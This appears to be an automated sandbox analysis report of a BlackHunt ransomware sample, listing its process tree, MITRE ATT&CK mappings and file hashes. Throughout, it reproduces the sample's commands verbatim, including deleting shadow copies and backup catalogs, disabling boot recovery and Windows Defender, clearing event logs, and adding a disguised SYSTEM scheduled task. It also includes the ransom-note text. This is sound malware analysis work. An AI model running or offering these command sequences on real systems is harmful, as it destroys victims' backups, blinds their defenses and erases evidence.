C:\Users\Admin\AppData\Local\Temp\a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe"C:\Users\Admin\AppData\Local\Temp\a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2864 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:508
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:600
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1056
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:688
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2256
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1956
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2288
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe" /F2⤵PID:2836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2776
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2344
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2784
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2020
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2156
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2948
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2624
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2452
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2504
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2464
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2696
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2656
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2176
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1116
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2620
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4032
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1056
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:228
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3124
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2488 -
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
PID:4048
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe"2⤵PID:4040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:2824
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:2264
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2320
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3060
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1120
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:1788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:3280
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:236
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1892
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2660
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:2868
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2384
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:588
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:2760
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:856
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:2592 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2788
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:1100
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:2096
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\a7d341287654b3bd9b46bb7a6c5833683e63efde961677cbee2167fb6e6a4496.exe" /F1⤵
- Creates scheduled task(s)
PID:1976
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:308
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:844
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2852
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2160
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:1228
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:384
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:324
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:856
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2492
-
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1536
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:2396
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:2944
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:1316
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:1788
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application2⤵
- Clears Windows event logs
PID:996
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2824
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:1644
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:2480
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:2744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:3024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:1432
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:1332
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵PID:224
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2002848992-970903895-1354041705-675861456615421173171244216413882384331612119544"1⤵PID:2592
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
PID:3184
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-292191018-1242458746136198482956278208-15320945591067990388-1923233027113244819"1⤵PID:2220
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:2156
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
PID:584
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:1136
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:3276
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:1676
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
PID:4060
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:272
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
PID:3624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "849436584-195179281278807545-532508050956139325190348622020960745873430819"1⤵PID:2888
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:776
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
- Suspicious use of WriteProcessMemory
PID:2560
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5ffc6a3c7e2113e7295fcc39509f74bde
SHA1f4cfd2523f5178be76075da9f10b0fe512b4a8d2
SHA2568c4120b58c21660118d26e1cfc2fefeed50c6a15183968373bcb46cf3d6f0376
SHA512d7b3cb99c84e6a296ae01d2015bbe2c70e62ad1f34bab3ee0393f71d54f809825d49daf93fca6cc1f428874ca3b5a3fa721b2ae43dfe24328e718d791b9fe77e
-
Filesize
12KB
MD5639ed4e19d5ec3b5e6ff35a545bb92e4
SHA199a034b36443cf166681bc766dc8cd904dc119f4
SHA2566a47eda656b4ca2153e9dce9dea25aa15155be87cd1323e489199f770884495b
SHA51201df61d6ee5cdba2e357c24cc235bccd968c605605cc2d3d7f177020a529c16b3e087c52c1f48052de7d21f9837da4bd788eca57228509b8ad58486545113b6b
-
Filesize
684B
MD5fdb5003e5d65f6db12e962e1ed61a325
SHA1b6f39ca25e09c35b03a6ffafadfe8b21f64158db
SHA25690dfa0870c9f05de23d97d9a2ffc6d6fa7fa16561c84a63b442949059d79cc9b
SHA512a380060d0410d273959c7092c29e6796c6d149746ba4ec22b8c6d39a072d6ededb3c6ff426e7e3b40ff939dadae2896ced66adcb6cfce2f3245577e05d43f0dc